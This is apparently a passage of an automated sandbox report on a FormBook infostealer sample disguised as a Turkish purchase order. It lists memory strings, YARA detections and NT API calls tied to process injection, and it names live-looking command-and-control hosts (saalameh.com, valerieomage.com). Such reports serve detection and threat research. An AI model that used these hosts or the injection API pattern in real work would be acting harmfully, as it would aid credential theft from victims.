            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4154513255.000000000516F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.saalameh.com
            Source: akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4154513255.000000000516F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.saalameh.com/hfb9/
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: fc.exe, 00000009.00000002.4153435982.00000000040F0000.00000004.10000000.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4152791515.00000000039E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
            Source: fc.exe, 00000009.00000002.4153435982.00000000040F0000.00000004.10000000.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4152791515.00000000039E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: fc.exe, 00000009.00000002.4153435982.00000000040F0000.00000004.10000000.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4152791515.00000000039E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
            Source: fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: fc.exe, 00000009.00000002.4151524691.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: fc.exe, 00000009.00000002.4151524691.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: fc.exe, 00000009.00000002.4151524691.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: fc.exe, 00000009.00000002.4151524691.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: fc.exe, 00000009.00000002.4151524691.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: fc.exe, 00000009.00000002.4151524691.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: fc.exe, 00000009.00000003.2332367117.0000000007598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: fc.exe, 00000009.00000002.4153435982.0000000004282000.00000004.10000000.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4152791515.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://valerieomage.com/k2gj?lxRlvTSh=ymeZBmicwKRkvYz1pzK8dvNYDsR2PzT6E62YqhKlQApFxMMJHFlv70ADTYJNZ
            Source: fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4152828319.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2137792677.0000000001C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.4154513255.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4152767044.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2137923561.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4152697754.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.4152828319.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2137792677.0000000001C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.4154513255.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.4152767044.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2137923561.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4152697754.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            .NET source code contains very large array initializations
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.2cdc3ac.0.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.7160000.4.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0042B2E3 NtClose,3_2_0042B2E3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932B60 NtClose,LdrInitializeThunk,3_2_01932B60
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01932DF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01932C70
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019335C0 NtCreateMutant,LdrInitializeThunk,3_2_019335C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01934340 NtSetContextThread,3_2_01934340
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01934650 NtSuspendThread,3_2_01934650
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932B80 NtQueryInformationFile,3_2_01932B80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932BA0 NtEnumerateValueKey,3_2_01932BA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932BF0 NtAllocateVirtualMemory,3_2_01932BF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932BE0 NtQueryValueKey,3_2_01932BE0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932AB0 NtWaitForSingleObject,3_2_01932AB0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932AD0 NtReadFile,3_2_01932AD0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932AF0 NtWriteFile,3_2_01932AF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932DB0 NtEnumerateKey,3_2_01932DB0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932DD0 NtDelayExecution,3_2_01932DD0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932D10 NtMapViewOfSection,3_2_01932D10
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932D00 NtSetInformationFile,3_2_01932D00
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932D30 NtUnmapViewOfSection,3_2_01932D30
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932CA0 NtQueryInformationToken,3_2_01932CA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932CC0 NtQueryVirtualMemory,3_2_01932CC0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932CF0 NtOpenProcess,3_2_01932CF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932C00 NtQueryInformationProcess,3_2_01932C00
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932C60 NtCreateKey,3_2_01932C60
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932F90 NtProtectVirtualMemory,3_2_01932F90
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932FB0 NtResumeThread,3_2_01932FB0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932FA0 NtQuerySection,3_2_01932FA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932FE0 NtCreateFile,3_2_01932FE0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932F30 NtCreateSection,3_2_01932F30
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932F60 NtCreateProcessEx,3_2_01932F60
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932E80 NtReadVirtualMemory,3_2_01932E80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932EA0 NtAdjustPrivilegesToken,3_2_01932EA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932EE0 NtQueueApcThread,3_2_01932EE0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932E30 NtWriteVirtualMemory,3_2_01932E30
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01933090 NtSetValueKey,3_2_01933090
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01933010 NtOpenDirectoryObject,3_2_01933010
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019339B0 NtGetContextThread,3_2_019339B0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01933D10 NtOpenProcessToken,3_2_01933D10
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01933D70 NtOpenThread,3_2_01933D70
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D44340 NtSetContextThread,LdrInitializeThunk,9_2_02D44340
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D44650 NtSuspendThread,LdrInitializeThunk,9_2_02D44650
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42AD0 NtReadFile,LdrInitializeThunk,9_2_02D42AD0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42AF0 NtWriteFile,LdrInitializeThunk,9_2_02D42AF0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_02D42BF0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42BE0 NtQueryValueKey,LdrInitializeThunk,9_2_02D42BE0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_02D42BA0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42B60 NtClose,LdrInitializeThunk,9_2_02D42B60
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42EE0 NtQueueApcThread,LdrInitializeThunk,9_2_02D42EE0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_02D42E80
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42FE0 NtCreateFile,LdrInitializeThunk,9_2_02D42FE0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42FB0 NtResumeThread,LdrInitializeThunk,9_2_02D42FB0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42F30 NtCreateSection,LdrInitializeThunk,9_2_02D42F30
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_02D42CA0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_02D42C70
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42C60 NtCreateKey,LdrInitializeThunk,9_2_02D42C60
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42DD0 NtDelayExecution,LdrInitializeThunk,9_2_02D42DD0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_02D42DF0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42D10 NtMapViewOfSection,LdrInitializeThunk,9_2_02D42D10
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_02D42D30
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D435C0 NtCreateMutant,LdrInitializeThunk,9_2_02D435C0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D439B0 NtGetContextThread,LdrInitializeThunk,9_2_02D439B0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42AB0 NtWaitForSingleObject,9_2_02D42AB0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42B80 NtQueryInformationFile,9_2_02D42B80
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42EA0 NtAdjustPrivilegesToken,9_2_02D42EA0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42E30 NtWriteVirtualMemory,9_2_02D42E30
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42F90 NtProtectVirtualMemory,9_2_02D42F90
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42FA0 NtQuerySection,9_2_02D42FA0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42F60 NtCreateProcessEx,9_2_02D42F60
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42CC0 NtQueryVirtualMemory,9_2_02D42CC0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42CF0 NtOpenProcess,9_2_02D42CF0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42C00 NtQueryInformationProcess,9_2_02D42C00
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42DB0 NtEnumerateKey,9_2_02D42DB0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42D00 NtSetInformationFile,9_2_02D42D00
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D43090 NtSetValueKey,9_2_02D43090
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D43010 NtOpenDirectoryObject,9_2_02D43010
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D43D70 NtOpenThread,9_2_02D43D70
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D43D10 NtOpenProcessToken,9_2_02D43D10
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003B80C0 NtDeleteFile,9_2_003B80C0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003B8160 NtClose,9_2_003B8160
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003B82B0 NtAllocateVirtualMemory,9_2_003B82B0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003B7E70 NtCreateFile,9_2_003B7E70
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003B7FD0 NtReadFile,9_2_003B7FD0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_012DD3640_2_012DD364
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_02C23F500_2_02C23F50
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_02C262780_2_02C26278
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_02C271A00_2_02C271A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_02C217100_2_02C21710
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_02C21B480_2_02C21B48
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_02C21B380_2_02C21B38
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_02C23EC10_2_02C23EC1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_02C23F190_2_02C23F19
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_071887880_2_07188788
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_071810600_2_07181060
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_07187F280_2_07187F28
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_07183D500_2_07183D50
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_0718F7780_2_0718F778
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_071887790_2_07188779
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_0718877B0_2_0718877B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_071864380_2_07186438
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_071824500_2_07182450
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_071824600_2_07182460
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_0718F3400_2_0718F340
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_071882B10_2_071882B1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_07187F180_2_07187F18
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_0718EF080_2_0718EF08
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_07180F890_2_07180F89
